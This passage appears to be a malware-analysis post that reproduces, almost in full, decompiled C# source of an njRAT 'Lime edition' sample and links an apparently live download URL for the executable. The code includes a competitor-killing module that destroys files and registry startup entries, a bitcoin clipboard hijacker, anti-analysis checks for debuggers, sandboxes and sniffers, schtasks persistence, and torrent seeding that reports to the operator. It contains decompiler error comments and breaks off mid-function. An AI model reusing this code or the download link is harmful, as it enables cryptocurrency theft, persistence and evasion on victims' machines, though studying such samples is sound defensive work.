From pastebin
Interesting to see inner workings
http://pastebin.com/raw/1PZLxaXx
http://46.101.104.141/klep/
hosts #njrat #lime edition as reported by
@FewAtoms and @James_inthe_box
Opening up
http://46.101.104.141/klep/uk.exe
in Ilspy gives the following decompiled code
-------------
// BotKillers
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Threading;
using System.Windows.Forms;
[StandardModule]
internal sealed class BotKillers
{
public enum ThreadAccess
{
DIRECT_IMPERSONATION = 0x200,
GET_CONTEXT = 8,
IMPERSONATE = 0x100,
QUERY_INFORMATION = 0x40,
SET_CONTEXT = 0x10,
SET_INFORMATION = 0x20,
SET_THREAD_TOKEN = 0x80,
SUSPEND_RESUME = 2,
TERMINATE = 1
}
public enum WinTrustDataUIChoice : uint
{
All = 1u,
None,
NoBad,
NoGood
}
public enum WinTrustDataRevocationChecks : uint
{
None,
WholeChain
}
public enum WinTrustDataChoice : uint
{
File = 1u,
Catalog,
Blob,
Signer,
Certificate
}
public enum WinTrustDataStateAction : uint
{
Ignore,
Verify,
Close,
AutoCache,
AutoCacheFlush
}
[Flags]
public enum WinTrustDataProvFlags : uint
{
UseIe4TrustFlag = 1u,
NoIe4ChainFlag = 2u,
NoPolicyUsageFlag = 4u,
RevocationCheckNone = 0x10,
RevocationCheckEndCert = 0x20,
RevocationCheckChain = 0x40,
RevocationCheckChainExcludeRoot = 0x80,
SaferFlag = 0x100,
HashOnlyFlag = 0x200,
UseDefaultOsverCheck = 0x400,
LifetimeSigningFlag = 0x800,
CacheOnlyUrlRetrieval = 0x1000
}
public enum WinTrustDataUIContext : uint
{
Execute,
Install
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public class WinTrustFileInfo
{
private int StructSize;
private IntPtr pszFilePath;
private IntPtr hFile;
private IntPtr pgKnownSubject;
public WinTrustFileInfo(string _filePath)
{
this.StructSize = Marshal.SizeOf(typeof(WinTrustFileInfo));
this.hFile = IntPtr.Zero;
this.pgKnownSubject = IntPtr.Zero;
this.pszFilePath = Marshal.StringToCoTaskMemAuto(_filePath);
}
~WinTrustFileInfo()
{
Marshal.FreeCoTaskMem(this.pszFilePath);
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public class WinTrustData
{
private int StructSize;
private IntPtr PolicyCallbackData;
private IntPtr SIPClientData;
private WinTrustDataUIChoice UIChoice;
private WinTrustDataRevocationChecks RevocationChecks;
private WinTrustDataChoice UnionChoice;
private IntPtr FileInfoPtr;
private WinTrustDataStateAction StateAction;
private IntPtr StateData;
private string URLReference;
private WinTrustDataProvFlags ProvFlags;
private WinTrustDataUIContext UIContext;
public WinTrustData(string _fileName)
{
this.StructSize = Marshal.SizeOf(typeof(WinTrustData));
this.PolicyCallbackData = IntPtr.Zero;
this.SIPClientData = IntPtr.Zero;
this.UIChoice = WinTrustDataUIChoice.None;
this.RevocationChecks = WinTrustDataRevocationChecks.None;
this.UnionChoice = WinTrustDataChoice.File;
this.StateAction = WinTrustDataStateAction.Ignore;
this.StateData = IntPtr.Zero;
this.URLReference = null;
this.ProvFlags = WinTrustDataProvFlags.SaferFlag;
this.UIContext = WinTrustDataUIContext.Execute;
WinTrustFileInfo structure = new WinTrustFileInfo(_fileName);
this.FileInfoPtr = Marshal.AllocCoTaskMem(Marshal.SizeOf(typeof(WinTrustFileInfo)));
Marshal.StructureToPtr(structure, this.FileInfoPtr, false);
}
~WinTrustData()
{
Marshal.FreeCoTaskMem(this.FileInfoPtr);
}
}
public enum WinVerifyTrustResult
{
Success,
ProviderUnknown = -2146762751,
ActionUnknown,
SubjectFormUnknown,
SubjectNotTrusted
}
public sealed class WinTrust
{
private static readonly IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);
private const string WINTRUST_ACTION_GENERIC_VERIFY_V2 = "{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}";
[DllImport("wintrust.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
private static extern WinVerifyTrustResult WinVerifyTrust([In] IntPtr hwnd, [In] [MarshalAs(UnmanagedType.LPStruct)] Guid pgActionID, [In] WinTrustData pWVTData);
public static bool VerifyEmbeddedSignature(string fileName)
{
try
{
WinTrustData pWVTData = new WinTrustData(fileName);
Guid pgActionID = new Guid("{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}");
WinVerifyTrustResult winVerifyTrustResult = WinTrust.WinVerifyTrust(WinTrust.INVALID_HANDLE_VALUE, pgActionID, pWVTData);
return winVerifyTrustResult == WinVerifyTrustResult.Success;
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
bool result = false;
ProjectData.ClearProjectError();
return result;
}
}
private WinTrust()
{
}
}
private static int ProccessKilled = 0;
private static int Startupkilled = 0;
private static string hio;
[DllImport("user32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool IsWindowVisible(IntPtr hWnd);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr FindWindow(string lpClassName, string lpWindowName);
public static void RunStandardBotKiller()
{
int num = default(int);
int num3 = default(int);
try
{
goto IL_0002;
IL_0002:
ProjectData.ClearProjectError();
num = -2;
goto IL_000b;
IL_000b:
int num2 = 2;
Interaction.Shell("TASKKILL /F /IM wscript.exe", AppWinStyle.Hide, false, -1);
goto IL_001b;
IL_001b:
num2 = 3;
Interaction.Shell("TASKKILL /F /IM cmd.exe", AppWinStyle.Hide, false, -1);
goto IL_002b;
IL_002b:
num2 = 4;
BotKillers.ScanProcess();
goto IL_0033;
IL_0033:
num2 = 5;
BotKillers.RunStartupKiller();
goto IL_003b;
IL_003b:
num2 = 6;
BotKillers.ProccessKilled = 0;
goto IL_0043;
IL_0043:
num2 = 7;
BotKillers.Startupkilled = 0;
goto end_IL_0001;
IL_004d:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 8:
goto end_IL_0001;
case 1:
goto IL_0002;
case 2:
goto IL_000b;
case 3:
goto IL_001b;
case 4:
goto IL_002b;
case 5:
goto IL_0033;
case 6:
goto IL_003b;
case 7:
goto IL_0043;
default:
goto IL_00b7;
}
IL_007d:
num3 = num2;
if (num > -2)
{
goto IL_0087;
}
goto IL_0084;
IL_0084:
int num5 = 1;
goto IL_0088;
IL_0087:
num5 = num;
goto IL_0088;
IL_0088:
switch (num5)
{
case 1:
goto IL_004d;
default:
goto IL_00b7;
}
end_IL_0001:;
}
catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
{
ProjectData.SetProjectError((Exception)obj);
/*Error near IL_00b5: Could not find block for branch target IL_007d*/;
}
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
return;
IL_00b7:
throw ProjectData.CreateProjectError(-2146828237);
}
public static void ScanProcess()
{
checked
{
try
{
Process[] processes = Process.GetProcesses();
int num = processes.Length - 1;
for (int i = 0; i <= num; i++)
{
Process process = processes[i];
try
{
string fullPath = Path.GetFullPath(process.MainModule.FileName);
if (BotKillers.IsFileMalicious(fullPath) && !BotKillers.WindowIsVisible(process.MainWindowTitle))
{
BotKillers.TerminateProcess(process.Id);
BotKillers.DestroyFile(fullPath);
BotKillers.ProccessKilled++;
}
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
}
catch (Exception projectError2)
{
ProjectData.SetProjectError(projectError2);
ProjectData.ClearProjectError();
}
}
}
public static bool IsFileMalicious(string fileloc)
{
bool result;
int num = default(int);
int num3 = default(int);
try
{
goto IL_0002;
IL_0002:
ProjectData.ClearProjectError();
num = -2;
goto IL_000b;
IL_000b:
int num2 = 2;
if (fileloc.Contains(Application.ExecutablePath))
{
goto IL_001e;
}
goto IL_0029;
IL_001e:
num2 = 3;
result = false;
goto end_IL_0001;
IL_0029:
num2 = 5;
if (fileloc.ToLower().Contains("malware"))
{
goto IL_0041;
}
goto IL_004c;
IL_0041:
num2 = 6;
BotKillers.DestroyFile(fileloc);
goto IL_004c;
IL_004c:
num2 = 8;
if (fileloc.Contains("Google.com"))
{
goto IL_005f;
}
goto IL_006b;
IL_005f:
num2 = 9;
result = false;
goto end_IL_0001;
IL_006b:
num2 = 11;
if (fileloc.Contains("Microsoft.com"))
{
goto IL_007f;
}
goto IL_008b;
IL_007f:
num2 = 12;
result = false;
goto end_IL_0001;
IL_008b:
num2 = 14;
if (fileloc.Contains("cmd"))
{
goto IL_009f;
}
goto IL_00ab;
IL_009f:
num2 = 15;
result = true;
goto end_IL_0001;
IL_00ab:
num2 = 17;
if (fileloc.Contains("wscript"))
{
goto IL_00bf;
}
goto IL_00cb;
IL_00bf:
num2 = 18;
result = true;
goto end_IL_0001;
IL_00cb:
num2 = 20;
if (fileloc.Contains(RuntimeEnvironment.GetRuntimeDirectory()))
{
goto IL_00df;
}
goto IL_00eb;
IL_00df:
num2 = 21;
result = true;
goto end_IL_0001;
IL_00eb:
num2 = 23;
if (WinTrust.VerifyEmbeddedSignature(fileloc))
{
goto IL_00fa;
}
goto IL_0103;
IL_00fa:
num2 = 24;
result = false;
goto end_IL_0001;
IL_0103:
num2 = 26;
if (fileloc.Contains(Environment.GetEnvironmentVariable("USERPROFILE")) | fileloc.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData)))
{
goto IL_012a;
}
goto IL_0133;
IL_012a:
num2 = 27;
result = true;
goto end_IL_0001;
IL_0133:
num2 = 29;
FileAttributes attributes = File.GetAttributes(fileloc);
goto IL_013e;
IL_013e:
num2 = 30;
if ((attributes & FileAttributes.System) == FileAttributes.System)
{
goto IL_014e;
}
goto IL_0157;
IL_014e:
num2 = 31;
result = true;
goto end_IL_0001;
IL_0157:
num2 = 33;
if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden)
{
goto IL_0167;
}
goto IL_0170;
IL_0167:
num2 = 34;
result = true;
goto end_IL_0001;
IL_0170:
num2 = 36;
result = false;
goto end_IL_0001;
IL_017c:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 37:
goto end_IL_0001;
case 1:
goto IL_0002;
case 2:
goto IL_000b;
case 3:
goto IL_001e;
case 4:
case 5:
goto IL_0029;
case 6:
goto IL_0041;
case 7:
case 8:
goto IL_004c;
case 9:
goto IL_005f;
case 10:
case 11:
goto IL_006b;
case 12:
goto IL_007f;
case 13:
case 14:
goto IL_008b;
case 15:
goto IL_009f;
case 16:
case 17:
goto IL_00ab;
case 18:
goto IL_00bf;
case 19:
case 20:
goto IL_00cb;
case 21:
goto IL_00df;
case 22:
case 23:
goto IL_00eb;
case 24:
goto IL_00fa;
case 25:
case 26:
goto IL_0103;
case 27:
goto IL_012a;
case 28:
case 29:
goto IL_0133;
case 30:
goto IL_013e;
case 31:
goto IL_014e;
case 32:
case 33:
goto IL_0157;
case 34:
goto IL_0167;
case 35:
case 36:
goto IL_0170;
default:
goto IL_025a;
}
IL_0220:
num3 = num2;
if (num > -2)
{
goto IL_022a;
}
goto IL_0227;
IL_0227:
int num5 = 1;
goto IL_022b;
IL_022a:
num5 = num;
goto IL_022b;
IL_022b:
switch (num5)
{
case 1:
goto IL_017c;
default:
goto IL_025a;
}
end_IL_0001:;
}
catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
{
ProjectData.SetProjectError((Exception)obj);
/*Error near IL_0258: Could not find block for branch target IL_0220*/;
}
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
return result;
IL_025a:
throw ProjectData.CreateProjectError(-2146828237);
}
public static void KillFile(string location)
{
try
{
DirectoryInfo directoryInfo = new DirectoryInfo(location);
DirectorySecurity directorySecurity = new DirectorySecurity();
directorySecurity.SetAccessRuleProtection(true, false);
directoryInfo.SetAccessControl(directorySecurity);
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
public static bool WindowIsVisible(string WinTitle)
{
try
{
IntPtr hWnd = BotKillers.FindWindow(null, WinTitle);
return BotKillers.IsWindowVisible(hWnd);
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
bool result = false;
ProjectData.ClearProjectError();
return result;
}
}
public static void RunStartupKiller()
{
int num = default(int);
int num4 = default(int);
try
{
goto IL_0002;
IL_0002:
ProjectData.ClearProjectError();
num = -2;
goto IL_000b;
IL_000b:
int num2 = 2;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 1);
goto IL_0019;
IL_0019:
num2 = 3;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 1);
goto IL_0027;
IL_0027:
num2 = 4;
if (BotKillers.IsAdmin())
{
goto IL_0034;
}
goto IL_0052;
IL_0034:
num2 = 5;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 2);
goto IL_0042;
IL_0042:
num2 = 6;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 2);
goto IL_0052;
IL_0052:
num2 = 8;
string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
goto IL_006f;
IL_006f:
num2 = 9;
IEnumerator<string> enumerator;
for (enumerator = MyProject.Computer.FileSystem.GetFiles(MyProject.Computer.FileSystem.SpecialDirectories.Programs + "\\Startup").GetEnumerator(); enumerator.MoveNext(); num2 = 17)
{
string current = enumerator.Current;
goto IL_00b4;
IL_01b8:
int num3 = num;
goto IL_01b9;
IL_00b4:
num2 = 10;
if (!current.Contains(OK.RG) & !current.Contains(fileNameWithoutExtension + ".url") & !current.Contains(".ini"))
{
goto IL_00f2;
}
continue;
IL_00f2:
num2 = 11;
BotKillers.DestroyFile(current);
goto IL_00fd;
IL_00fd:
num2 = 12;
Thread.Sleep(50);
goto IL_0108;
IL_0108:
num2 = 13;
BotKillers.DestroyFile(current);
goto IL_0113;
IL_0113:
num2 = 14;
Thread.Sleep(50);
goto IL_011e;
IL_011e:
num2 = 15;
BotKillers.DestroyFile(current);
continue;
IL_0152:
int num5 = num4 + 1;
num4 = 0;
switch (num5)
{
case 19:
goto end_IL_0001;
case 1:
goto IL_0002;
case 2:
goto IL_000b;
case 3:
goto IL_0019;
case 4:
goto IL_0027;
case 5:
goto IL_0034;
case 6:
goto IL_0042;
case 7:
case 8:
goto IL_0052;
case 9:
goto IL_006f;
case 10:
goto IL_00b4;
case 11:
goto IL_00f2;
case 12:
goto IL_00fd;
case 13:
goto IL_0108;
case 14:
goto IL_0113;
case 15:
goto IL_011e;
case 16:
case 17:
continue;
case 18:
goto end_IL_012e;
default:
goto IL_01e8;
}
IL_01b9:
switch (num3)
{
case 1:
goto IL_0152;
default:
goto IL_01e8;
}
IL_01b5:
num3 = 1;
goto IL_01b9;
IL_01ae:
num4 = num2;
if (num > -2)
{
goto IL_01b8;
}
goto IL_01b5;
continue;
end_IL_012e:
break;
}
num2 = 18;
enumerator?.Dispose();
end_IL_0001:;
}
catch (object obj) when (obj is Exception & num != 0 & num4 == 0)
{
ProjectData.SetProjectError((Exception)obj);
/*Error near IL_01e6: Could not find block for branch target IL_01ae*/;
}
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
return;
IL_01e8:
throw ProjectData.CreateProjectError(-2146828237);
}
public static void StartupFucker(string regkey, int type)
{
try
{
RegistryKey registryKey = default(RegistryKey);
if (type == 1)
{
registryKey = Registry.CurrentUser.OpenSubKey(regkey);
}
if (type == 2)
{
registryKey = Registry.LocalMachine.OpenSubKey(regkey);
}
string[] valueNames = registryKey.GetValueNames();
foreach (string text in valueNames)
{
try
{
string text2 = registryKey.GetValue(text).ToString();
if (text2.Contains("-"))
{
if (text2.Contains("\""))
{
text2.Replace("\"", string.Empty);
}
try
{
string[] array = Strings.Split(text2, " -", -1, CompareMethod.Binary);
text2 = array[0];
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
if (text2.Contains("\""))
{
object[] array2 = text2.Split('"');
text2 = Conversions.ToString(array2[1]);
}
if (!text2.Contains(Application.ExecutablePath))
{
BotKillers.RemoveKey(type, text, regkey, text2);
if (!WinTrust.VerifyEmbeddedSignature(text2))
{
BotKillers.TerminateProcessPath(text2);
BotKillers.DestroyFile(text2);
}
}
}
catch (Exception projectError2)
{
ProjectData.SetProjectError(projectError2);
ProjectData.ClearProjectError();
}
}
}
catch (Exception projectError3)
{
ProjectData.SetProjectError(projectError3);
ProjectData.ClearProjectError();
}
}
public static void RemoveKey(int Reg, string file, string reglocation, string FileLocation)
{
try
{
RegistryKey registryKey = null;
registryKey = ((Reg != 1) ? Registry.LocalMachine.OpenSubKey(reglocation, true) : Registry.CurrentUser.OpenSubKey(reglocation, true));
using (registryKey)
{
registryKey?.DeleteValue(file);
}
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public static void DestroyFile(string path)
{
try
{
if (File.Exists(path))
{
Random random = new Random();
try
{
BotKillers.AllowAccess(path);
MyProject.Computer.FileSystem.MoveFile(path, Path.GetTempPath() + Conversions.ToString(random.Next(10000, 90000)));
File.WriteAllText(path, string.Empty);
FileSystem.FileOpen(FileSystem.FreeFile(), path, OpenMode.Input, OpenAccess.Default, OpenShare.LockReadWrite, -1);
BotKillers.KillFile(path);
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
DirectoryInfo directoryInfo = new DirectoryInfo(path);
DirectorySecurity directorySecurity = new DirectorySecurity();
directorySecurity.SetAccessRuleProtection(true, false);
directoryInfo.SetAccessControl(directorySecurity);
ProjectData.ClearProjectError();
}
}
}
catch (Exception projectError2)
{
ProjectData.SetProjectError(projectError2);
ProjectData.ClearProjectError();
}
}
public static bool IsAdmin()
{
try
{
WindowsIdentity current = WindowsIdentity.GetCurrent();
WindowsPrincipal windowsPrincipal = new WindowsPrincipal(current);
return windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator);
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
bool result = false;
ProjectData.ClearProjectError();
return result;
}
}
public static void AllowAccess(string location)
{
try
{
DirectoryInfo directoryInfo = new DirectoryInfo(location);
DirectorySecurity directorySecurity = new DirectorySecurity();
directorySecurity.SetAccessRuleProtection(false, true);
directoryInfo.SetAccessControl(directorySecurity);
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
public static void TerminateProcessPath(string Path)
{
checked
{
try
{
if (!Path.Contains(Process.GetCurrentProcess().ProcessName.ToString()))
{
if (Path.Contains("\\"))
{
string[] array = Strings.Split(Path, "\\", -1, CompareMethod.Binary);
string[] array2 = array;
foreach (string text in array2)
{
if (text.Contains(".exe"))
{
Path = text;
}
}
}
if (Path.Contains(".exe"))
{
Path = Path.Replace(".exe", string.Empty);
}
Process[] processes = Process.GetProcesses();
int num = processes.Length - 1;
for (int j = 0; j <= num; j++)
{
Process process = processes[j];
if (process.ProcessName.Contains(Path))
{
BotKillers.TerminateProcess(process.Id);
}
}
}
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
}
public static void TerminateProcess(int PID)
{
try
{
Process processById = Process.GetProcessById(PID);
if (Operators.CompareString(processById.ProcessName, string.Empty, false) != 0)
{
IEnumerator enumerator = default(IEnumerator);
try
{
enumerator = processById.Threads.GetEnumerator();
while (enumerator.MoveNext())
{
ProcessThread processThread = (ProcessThread)enumerator.Current;
IntPtr intPtr = BotKillers.OpenThread((ThreadAccess)3, true, checked((uint)processThread.Id));
if (intPtr != IntPtr.Zero)
{
BotKillers.SuspendThread(intPtr);
BotKillers.TerminateThread(intPtr, 1u);
BotKillers.CloseHandle(intPtr);
}
}
}
finally
{
if (enumerator is IDisposable)
{
(enumerator as IDisposable).Dispose();
}
}
}
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool CloseHandle(IntPtr hHandle);
[DllImport("kernel32.dll")]
private static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern int SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll")]
private static extern bool TerminateThread(IntPtr hThread, uint dwExitCode);
}
// CallEveryXSeconds
using j;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Timers;
using System.Windows.Forms;
public class CallEveryXSeconds
{
[Serializable]
[CompilerGenerated]
internal sealed class _Closure$__
{
public static readonly _Closure$__ $I;
public static ParameterizedThreadStart $IR2-1;
static _Closure$__()
{
_Closure$__.$I = new _Closure$__();
}
[DebuggerHidden]
internal void _Lambda$__R2-1(object a0)
{
Clipboard.SetText(Conversions.ToString(a0));
}
}
private static System.Timers.Timer Timer;
private static OK N = new OK();
public static void Handler(object sender, ElapsedEventArgs e)
{
Process[] processes = Process.GetProcesses();
Process[] array = processes;
foreach (Process process in array)
{
if (process.MainWindowTitle.ToLower().Contains("BITCOIN".ToLower()))
{
try
{
Thread thread = new Thread((_Closure$__.$IR2-1 == null) ? (_Closure$__.$IR2-1 = delegate(object a0)
{
Clipboard.SetText(Conversions.ToString(a0));
}) : _Closure$__.$IR2-1);
thread.SetApartmentState(ApartmentState.STA);
thread.Start(OK.BTC_ADD);
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
}
}
public static void Start()
{
CallEveryXSeconds.Timer = new System.Timers.Timer(1000.0);
CallEveryXSeconds.Timer.Elapsed += CallEveryXSeconds.Handler;
CallEveryXSeconds.Timer.Enabled = true;
}
public static void stopme()
{
CallEveryXSeconds.Timer.Elapsed += CallEveryXSeconds.Handler;
CallEveryXSeconds.Timer.Stop();
}
}
// MyAntiProcess
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Timers;
using System.Windows.Forms;
public class MyAntiProcess
{
private static System.Timers.Timer Timer;
private static OK N = new OK();
[DllImport("kernel32", CharSet = CharSet.Ansi, EntryPoint = "GetModuleHandleA", ExactSpelling = true, SetLastError = true)]
private static extern long GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpModuleName);
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public static void Handler(object sender, ElapsedEventArgs e)
{
Process[] processes = Process.GetProcesses();
Process[] array = processes;
foreach (Process process in array)
{
if (process.MainWindowTitle.Contains("Process Hacker") | process.MainWindowTitle.Contains("Process Explorer"))
{
ProjectData.EndApp();
}
}
Process[] processesByName = Process.GetProcessesByName("dnSpy");
foreach (Process process2 in processesByName)
{
ProjectData.EndApp();
}
Process[] processesByName2 = Process.GetProcessesByName("CodeReflect");
foreach (Process process3 in processesByName2)
{
ProjectData.EndApp();
}
Process[] processesByName3 = Process.GetProcessesByName("Reflector");
foreach (Process process4 in processesByName3)
{
ProjectData.EndApp();
}
Process[] processesByName4 = Process.GetProcessesByName("ILSpy");
foreach (Process process5 in processesByName4)
{
ProjectData.EndApp();
}
Process[] processesByName5 = Process.GetProcessesByName("VGAuthService");
foreach (Process process6 in processesByName5)
{
ProjectData.EndApp();
}
Process[] processesByName6 = Process.GetProcessesByName("VBoxService");
foreach (Process process7 in processesByName6)
{
ProjectData.EndApp();
}
Process[] processesByName7 = Process.GetProcessesByName("Sandboxie Control");
foreach (Process process8 in processesByName7)
{
ProjectData.EndApp();
}
Process[] processesByName8 = Process.GetProcessesByName("IPBlocker");
foreach (Process process9 in processesByName8)
{
ProjectData.EndApp();
}
Process[] processesByName9 = Process.GetProcessesByName("TiGeR-Firewall");
foreach (Process process10 in processesByName9)
{
ProjectData.EndApp();
}
Process[] processesByName10 = Process.GetProcessesByName("smsniff");
foreach (Process process11 in processesByName10)
{
ProjectData.EndApp();
}
Process[] processesByName11 = Process.GetProcessesByName("exeinfoPE");
foreach (Process process12 in processesByName11)
{
ProjectData.EndApp();
}
Process[] processesByName12 = Process.GetProcessesByName("NetSnifferCs");
foreach (Process process13 in processesByName12)
{
ProjectData.EndApp();
}
Process[] processesByName13 = Process.GetProcessesByName("wireshark");
foreach (Process process14 in processesByName13)
{
ProjectData.EndApp();
}
Process[] processesByName14 = Process.GetProcessesByName("apateDNS");
foreach (Process process15 in processesByName14)
{
ProjectData.EndApp();
}
Process[] processesByName15 = Process.GetProcessesByName("SbieCtrl");
foreach (Process process16 in processesByName15)
{
ProjectData.EndApp();
}
Process[] processesByName16 = Process.GetProcessesByName("SpyTheSpy");
foreach (Process process17 in processesByName16)
{
ProjectData.EndApp();
}
}
public static void Start()
{
MyAntiProcess.Timer = new System.Timers.Timer(1000.0);
MyAntiProcess.Timer.Elapsed += MyAntiProcess.Handler;
MyAntiProcess.Timer.Enabled = true;
}
public static void stopme()
{
MyAntiProcess.Timer.Elapsed += MyAntiProcess.Handler;
MyAntiProcess.Timer.Stop();
}
public static void AutoAnti()
{
object executablePath = Application.ExecutablePath;
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject("schtasks /create /tn NYAN /tr \"", executablePath), "\" /sc minute /mo 1")), AppWinStyle.Hide, false, -1);
}
public static void XAnti()
{
object executablePath = Application.ExecutablePath;
Interaction.Shell("schtasks /Delete /tn NYAN /F", AppWinStyle.Hide, false, -1);
}
}
// Torrent
using j;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
[StandardModule]
internal sealed class Torrent
{
public static string UTorrentLocalPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\uTorrent\\uTorrent.exe";
public static string BitLocalPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BitTorrent\\BitTorrent.exe";
[DllImport("user32.dll")]
private static extern int ShowWindow(int hwnd, int nCmdShow);
public static void SeedTorrent(string path)
{
int num = default(int);
int num3 = default(int);
try
{
goto IL_0002;
IL_0002:
ProjectData.ClearProjectError();
num = -2;
goto IL_000b;
IL_000b:
int num2 = 2;
if (Torrent.IsBitTorrent())
{
goto IL_0016;
}
goto IL_0048;
IL_0016:
num2 = 3;
Torrent.SeedIt(Torrent.BitLocalPath, Torrent.BitLocalPath, path);
goto IL_0029;
IL_0029:
num2 = 4;
OK.Send("MSG" + OK.Y + "Seeding with BitTorrent");
goto end_IL_0001;
IL_0048:
num2 = 6;
if (Torrent.IsUtorrent())
{
goto IL_0055;
}
goto IL_0088;
IL_0055:
num2 = 7;
Torrent.SeedIt(Torrent.UTorrentLocalPath, Torrent.UTorrentLocalPath, path);
goto IL_0068;
IL_0068:
num2 = 8;
OK.Send("MSG" + OK.Y + "Seeding with uTorrent");
goto end_IL_0001;
IL_0088:
num2 = 10;
OK.Send("MSG" + OK.Y + "No Torrent Software Installed");
goto end_IL_0001;
IL_00ab:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 5:
goto end_IL_0001;
case 9:
goto end_IL_0001;
case 11:
goto end_IL_0001;
case 12:
goto end_IL_0001;
case 1:
goto IL_0002;
case 2:
goto IL_000b;
case 3:
goto IL_0016;
case 4:
goto IL_0029;
case 6:
goto IL_0048;
case 7:
goto IL_0055;
case 8:
goto IL_0068;
case 10:
goto IL_0088;
default:
goto IL_0125;
}
IL_00eb:
num3 = num2;
if (num > -2)
{
goto IL_00f5;
}
goto IL_00f2;
IL_00f2:
int num5 = 1;
goto IL_00f6;
IL_00f5:
num5 = num;
goto IL_00f6;
IL_00f6:
switch (num5)
{
case 1:
goto IL_00ab;
default:
goto IL_0125;
}
end_IL_0001:;
}
catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
{
ProjectData.SetProjectError((Exception)obj);
/*Error near IL_0123: Could not find block for branch target IL_00eb*/;
}
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
return;
IL_0125:
throw ProjectData.CreateProjectError(-2146828237);
}
public static string GetFileNameFromURL(string URL)
{
try
{
return URL.Substring(checked(URL.LastIndexOf("/", StringComparison.Ordinal) + 1));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.ClearProjectError();
return URL;
}
}
public static bool IsUtorrent()
{
bool result;
int num = default(int);
int num3 = default(int);
try
{
goto IL_0002;
IL_0002:
ProjectData.ClearProjectError();
num = -2;
goto IL_000b;
IL_000b:
int num2 = 2;
if (File.Exists(Torrent.UTorrentLocalPath))
{
goto IL_001d;
}
goto IL_0025;
IL_001d:
num2 = 3;
result = true;
goto end_IL_0001;
IL_0025:
num2 = 5;
result = false;
goto end_IL_0001;
IL_002d:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 6:
goto end_IL_0001;
case 1:
goto IL_0002;
case 2:
goto IL_000b;
case 3:
goto IL_001d;
case 4:
case 5:
goto IL_0025;
default:
goto IL_008f;
}
IL_0055:
num3 = num2;
if (num > -2)
{
goto IL_005f;
}
goto IL_005c;
IL_005c:
int num5 = 1;
goto IL_0060;
IL_005f:
num5 = num;
goto IL_0060;
IL_0060:
switch (num5)
{
case 1:
goto IL_002d;
default:
goto IL_008f;
}
end_IL_0001:;
}
catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
{
ProjectData.SetProjectError((Exception)obj);
